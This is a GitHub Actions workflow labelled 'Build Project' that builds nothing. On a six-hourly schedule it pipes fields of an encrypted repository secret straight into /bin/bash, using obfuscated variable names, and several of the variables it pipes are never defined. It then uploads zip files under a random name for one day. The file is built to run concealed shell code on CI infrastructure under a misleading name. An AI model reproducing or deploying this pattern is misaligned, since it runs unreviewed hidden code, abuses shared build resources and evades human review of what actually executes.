name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '49 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          j4621: ${{ secrets.j4621 }}
        run: |
          printf '%s' "$j4621" | jq -r .t00828 | /bin/bash
          printf '%s' "$rth85" | jq -r .jqtk2222 | /bin/bash
          printf '%s' "$oku9" | jq -r .lfph00745 | /bin/bash
          printf '%s' "$b07" | jq -r .wpsk81 | /bin/bash
          printf '%s' "$ksclt9726" | jq -r .qpmp823 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: a0wH2ryP
          path: "*.zip"
          retention-days: 1
